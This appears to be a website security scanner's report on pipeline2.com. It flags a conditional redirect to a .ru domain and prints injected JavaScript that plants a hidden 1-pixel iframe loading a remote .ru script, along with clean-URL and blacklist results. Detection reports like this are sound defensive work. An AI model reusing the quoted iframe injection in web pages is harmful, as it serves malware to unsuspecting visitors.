Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pipeline2.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pipeline2.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 29 Nov 2015 10:44:29 GMT Location: http://ypnofkiq.ru/count28.php Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://pipeline2.com/ | 200 OK Content-Length: 4267 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)

    function zzzfff() {
        var xi = document.createElement('iframe');
        xi.src = 'http://ryteopby.ru/count4.php';
        xi.style.position = 'absolute';
        xi.style.border = '0';
        xi.style.height = '1px';
        xi.style.width = '1px';
        xi.style.left = '1px';
        xi.style.top = '1px';
        if (!document.getElementById('xi')) {
            document.write('<div id=\'xi\'></div>');
            document.getElementById('xi').appendChild(xi);
        }
    }
    function SetCookie(cookieName,cookieValue,nDays,path) {
        var today = new Date();
        var expire = new Date();
        i

Antivirus reports:
http://ldm.by/images/SHARK-1.php | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0,no-cache,no-store Connection: close Date: Sun, 29 Nov 2015 10:44:30 GMT Location: http://www.ldm.by/ Server: nginx Content-Length: 0 Content-Type: text/plain; charset=utf-8 | clean |
http://www.ldm.by/ | 200 OK Content-Length: 22424 Content-Type: text/html | clean |
https://mc.yandex.ru/metrika/watch.js | 200 OK Content-Length: 65912 Content-Type: application/x-javascript | clean |
http://ldm.by/images/js.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://ldm.by/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pipeline2.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pipeline2.com/
Result: pipeline2.com is not infected or malware details are not published yet.